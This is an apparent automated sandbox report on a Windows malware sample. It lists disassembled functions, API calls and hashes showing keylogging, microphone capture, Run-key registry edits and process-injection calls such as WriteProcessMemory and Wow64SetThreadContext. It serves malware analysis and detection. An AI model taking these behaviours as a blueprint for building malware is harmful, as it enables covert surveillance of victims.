                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 39102293-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                                                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CountEventTick
                                                                                                                                                                                                                                                                                                • String ID: >G
                                                                                                                                                                                                                                                                                                • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                                                                                • Opcode ID: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                                                                                                                                                                                                                                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8970c785a5fde0425d3bdd382a7839f198ae3ee3428ffa10454bc42c3a0da609
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                                                                                                                                • String ID: $fD
                                                                                                                                                                                                                                                                                                • API String ID: 1807457897-3092946448
                                                                                                                                                                                                                                                                                                • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                                                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                                                                                                                                                                                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                                                                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                                                                                • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                                                                                • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                                                                                                                                                                                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: alarm.wav$xIG
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-4080756945
                                                                                                                                                                                                                                                                                                • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                                                                                • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                                                                                • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                                                                                • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                                                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                                                                                                                                • String ID: T=G
                                                                                                                                                                                                                                                                                                • API String ID: 2315374483-379896819
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                                                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LocaleValid
                                                                                                                                                                                                                                                                                                • String ID: IsValidLocaleName$j=D
                                                                                                                                                                                                                                                                                                • API String ID: 1901932003-3128777819
                                                                                                                                                                                                                                                                                                • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                                                                                                                                                • String ID: T=G$T=G
                                                                                                                                                                                                                                                                                                • API String ID: 3519838083-3732185208
                                                                                                                                                                                                                                                                                                • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                                                                                                                                                                • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                                                                                                                                • String ID: [AltL]$[AltR]
                                                                                                                                                                                                                                                                                                • API String ID: 2738857842-2658077756
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                                                                                                                                • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00448825
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                                                                                • String ID: `@$`@
                                                                                                                                                                                                                                                                                                • API String ID: 1353095263-20545824
                                                                                                                                                                                                                                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                                                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: State
                                                                                                                                                                                                                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                                                                                                                                • API String ID: 1649606143-2446555240
                                                                                                                                                                                                                                                                                                • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                                                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteOpenValue
                                                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                                                                                • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                                                                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                                                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                                                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:8.3%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                Total number of Nodes:150
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:13
                                                                                                                                                                                                                                                                                                execution_graph 25117 af4668 25118 af467a 25117->25118 25119 af4686 25118->25119 25121 af4778 25118->25121 25122 af479d 25121->25122 25126 af4879 25122->25126 25130 af4888 25122->25130 25128 af48af 25126->25128 25127 af498c 25128->25127 25134 af44b4 25128->25134 25132 af48af 25130->25132 25131 af498c 25131->25131 25132->25131 25133 af44b4 CreateActCtxA 25132->25133 25133->25131 25135 af5918 CreateActCtxA 25134->25135 25137 af59db 25135->25137 25137->25137 25147 508c4bf 25148 508c201 25147->25148 25149 508c316 25148->25149 25152 508d108 25148->25152 25166 508d0f8 25148->25166 25153 508d122 25152->25153 25154 508d146 25153->25154 25180 508d829 25153->25180 25185 508de34 25153->25185 25189 508d674 25153->25189 25194 508d973 25153->25194 25200 508d7b3 25153->25200 25206 508d5df 25153->25206 25212 508db7b 25153->25212 25217 508dbd9 25153->25217 25222 508d907 25153->25222 25228 508d526 25153->25228 25232 508dacb 25153->25232 25154->25149 25167 508d122 25166->25167 25168 508d146 25167->25168 25169 508d829 2 API calls 25167->25169 25170 508dacb 2 API calls 25167->25170 25171 508d526 2 API calls 25167->25171 25172 508d907 4 API calls 25167->25172 25173 508dbd9 2 API calls 25167->25173 25174 508db7b 2 API calls 25167->25174 25175 508d5df 4 API calls 25167->25175 25176 508d7b3 4 API calls 25167->25176 25177 508d973 4 API calls 25167->25177 25178 508d674 4 API calls 25167->25178 25179 508de34 2 API calls 25167->25179 25168->25149 25169->25168 25170->25168 25171->25168 25172->25168 25173->25168 25174->25168 25175->25168 25176->25168 25177->25168 25178->25168 25179->25168 25181 508d8ac 25180->25181 25237 508b9c1 25181->25237 25241 508b9c8 25181->25241 25182 508d8c7 25245 508ba99 25185->25245 25249 508baa0 25185->25249 25186 508de55 25253 508bd28 25189->25253 25258 508bc50 25189->25258 25262 508bc48 25189->25262 25190 508d6a3 25190->25154 25195 508d5fd 25194->25195 25196 508d61e 25195->25196 25197 508bc48 2 API calls 25195->25197 25268 508bb60 25195->25268 25272 508bb59 25195->25272 25196->25154 25197->25196 25203 508bc48 2 API calls 25200->25203 25204 508bb59 WriteProcessMemory 25200->25204 25205 508bb60 WriteProcessMemory 25200->25205 25201 508d71d 25201->25200 25202 508d587 25201->25202 25202->25154 25203->25201 25204->25201 25205->25201 25207 508d5e5 25206->25207 25209 508bc48 2 API calls 25207->25209 25210 508bb59 WriteProcessMemory 25207->25210 25211 508bb60 WriteProcessMemory 25207->25211 25208 508d61e 25208->25154 25209->25208 25210->25208 25211->25208 25215 508b9c8 Wow64SetThreadContext 25212->25215 25216 508b9c1 Wow64SetThreadContext 25212->25216 25213 508d775 25213->25212 25214 508dddd 25213->25214 25215->25213 25216->25213 25218 508daec 25217->25218 25219 508dbe6 25217->25219 25218->25217 25276 508b918 25218->25276 25280 508b910 25218->25280 25223 508d910 25222->25223 25225 508bc48 2 API calls 25223->25225 25226 508bb59 WriteProcessMemory 25223->25226 